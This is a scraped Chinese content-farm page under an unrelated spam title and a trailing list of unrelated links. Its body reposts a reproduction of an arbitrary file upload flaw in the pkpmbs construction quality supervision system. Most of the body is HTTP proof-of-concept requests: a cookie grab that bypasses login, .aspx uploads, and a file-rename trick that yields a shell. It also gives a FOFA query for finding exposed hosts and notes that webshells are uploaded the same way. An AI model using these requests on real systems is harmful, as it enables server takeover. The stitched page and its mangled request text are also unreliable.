当前位置: 首页 > news >正文

如何开展网站建设手机聊天app开发

如何开展网站建设,手机聊天app开发,phpmysql网站开发视频,wordpress指定页面连接0x01 产品简介 pkpmbs 建设工程质量监督系统是湖南建研信息技术股份有限公司一个与工程质量检测管理系统相结合的#xff0c;B/S架构的检测信息监管系统。 0x02 漏洞概述 pkpmbs 建设工程质量监督系统 FileUpOrDown.aspx、/Platform/System/FileUpload.ashx、接口处存在任意文…0x01 产品简介 pkpmbs 建设工程质量监督系统是湖南建研信息技术股份有限公司一个与工程质量检测管理系统相结合的B/S架构的检测信息监管系统。 0x02 漏洞概述 pkpmbs 建设工程质量监督系统 FileUpOrDown.aspx、/Platform/System/FileUpload.ashx、接口处存在任意文件上传漏洞未经身份认证的攻击者可以利用漏洞上传恶意后门文件从而获取服务器权限。 0x03 影响范围 标准版 2.2023.0328.172228 0x04 复现环境 FOFAicon_hash2001627082 0x05 漏洞复现  PoC-1 GET /Login.cshtml HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip 获取有效cookie绕过权限认证 携带cookie上传文件  POST /Applications/Forms/SearchSetting/FileUpOrDown.ashx?operationFileuploadextName.aspxsearchConfigName上传的文件名 HTTP/1.1 Host: your-ip Cookie: your-cookie Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9 Content-Type: multipart/form-data; boundary----WebKitFormBoundarybqACRhAMBHmQQAUP Content-Length: 185------WebKitFormBoundarybqACRhAMBHmQQAUP Content-Disposition: form-data; nameFiledata; filename1.aspx Content-Type: image/pngtest ------WebKitFormBoundarybqACRhAMBHmQQAUP-- 回显了上传路径验证 Getshell PoC-2  POST /Platform/System/FileUpload.ashx HTTP/1.1 Host: your-ip Content-Type: multipart/form-data; boundary----WebKitFormBoundarybqACRhAMBHmQQAUP Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15------WebKitFormBoundarybqACRhAMBHmQQAUP Content-Disposition: form-data; namefile; filename1.aspx Content-Type: image/pngtest ------WebKitFormBoundarybqACRhAMBHmQQAUP Content-Disposition: form-data; nametarget/Applications/SkillDevelopAndEHS/ ------WebKitFormBoundarybqACRhAMBHmQQAUP-- PS直接是不允许上传aspx文件需要先上传txt、png等类型文件然后转换文件格式  上传png文件 转换文件类型 GET /Applications/SkillDevelopAndEHS/fileMove.cshtml?filePath上传的文件名factFilePath1.aspx HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip 根据上面回显的路径验证 上传马子也是同样的姿势 0x06 修复建议 官方已修复该漏洞请用户联系厂商升级至安全版本http://www.hunanjianyan.com/ 通过防火墙等安全设备设置访问策略设置白名单访问。 如非必要禁止公网访问该系统。
http://www.pierceye.com/news/323587/

相关文章:

  • 网站开发设计图片搭建论坛需要多少钱
  • 网站建设价格明细做一套二级域名网站怎么做
  • 网站建设 发展方向手机开发人员选项怎么打开
  • 深圳网站建设深圳网络邢台市政建设集团股份有限公司网站
  • 广东网站开发搭建旅游网站开发内容
  • 恭城网站建设中象做网站怎么样
  • 泰兴网站建设开发门户网站内容建设岗位职责
  • 单页网站有后台搜索引擎优化工具有哪些
  • 视频网站弹幕怎么做中小企业网站优化
  • 南充网站建设江宁外贸网站建设
  • 从事网站开发需要的证书泰安百度推广代理
  • 找工作哪个网站好2022查询网站备案显示划横线
  • 06627网页制作和网站建设如何制作自己的公司内部网站
  • 网站营销与推广方案百度大数据分析
  • 手机怎么做自己的网站做网站的公司广州
  • asp.net网站开发案例教程南京seo排名
  • 购物网站开发技术分销
  • 企业网站建设专家工业产品设计包括哪些
  • 潍坊网站开发高手重庆市设计院
  • 微信公众号平台网站开发WordPress破解分享
  • 东营网站建设服务商低价备案域名购买
  • 高校网站建设自查报告哪个外贸网站开发客户比较好用
  • 网站做付费推广都需要问什么wordpress小工具插件
  • 网站的建设技术有哪些北京一环都是住什么人
  • 做外贸soho网站的公司吗已有备案号新增网站备案要关闭原先的站点吗
  • 网站域名注册免费wordpress 让导航悬浮
  • 全景旅游网站项目建设湖南建筑公司网站
  • 做网批那个网站好免费视频素材库app
  • cms建站模板appseo网络优化是什么工作
  • 云落wordpress优化大师在哪里